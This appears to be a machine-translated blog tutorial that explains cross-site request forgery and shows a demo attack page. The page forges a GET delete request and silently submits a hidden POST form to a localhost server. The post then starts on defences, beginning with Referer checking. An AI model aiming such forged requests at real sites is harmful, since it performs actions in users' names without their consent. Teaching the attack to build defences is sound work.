A few days ago, I thought of CRSF attack when I was considering the way of front and back end authentication. Because I only understood the general principle and had not really implemented it before, I wanted to write a demo to implement it.
CSRF concept
CSRF cross-site Request Forgery, like XSS, is a major hazard. An attacker steals your identity and sends a malicious request in your name that is perfectly legal to the server, but does what the attacker intended.Copy the code
CSRF principle
- User C opens the browser, accesses trusted website A, and enters the user name and password to request to log in to website A.
- After the user information is authenticated, website A generates Cookie information and returns it to the browser. Then, the user successfully logs in to website A and sends requests to website A
- Before exiting website A, the user opens A TAB page in the same browser to visit website B.
- After receiving the user’s request, website B returns some offensive code and sends A request to visit third-party site A.
- After receiving these offensive codes, the browser, according to the request of website B, carries the Cookie information without the user’s knowledge and sends A request to Website A. Website A does not know that the request is actually initiated by B, so it will process the request with C’s permission according to the Cookie information of user C, resulting in the malicious code from Website B being executed.
implementation
Secure site with CSRF security vulnerability
Assume that the user logs in successfully and leaves authenticated cookies in the browser and performs some operations, as shown in the figure below:
CSRF attacks are carried out in GET and POST modes
code
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="Width = device - width, initial - scale = 1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Document</title>
</head>
<body>
<button onclick="btn1()">CSRF attacks the GET method</button>
<button onclick="btn2()">CSRF attacks the POST method</button>
<form action="http://localhost:8080/bb" method="post" id="test">
<input style="display:none;" type="text" name="user" value="5"><br>
<input style="display:none;" type="text" name="pass" value="55">
</form>
<script>
function btn1() {
window.location.href = "http://localhost:8080/aa? ID=12345&delete=55"
}
function btn2() {
const f = document.getElementById('test');
f.submit();
}
</script>
</body>
</html>
Copy the code
The execution result
In this way, you can see that the attack is successful, and the other is that the browser automatically puts the cookies on the request, and after the authentication is passed, the unexpected operation.
Methods to prevent
1. Validate the referer request header: it records the source address of the HTTP request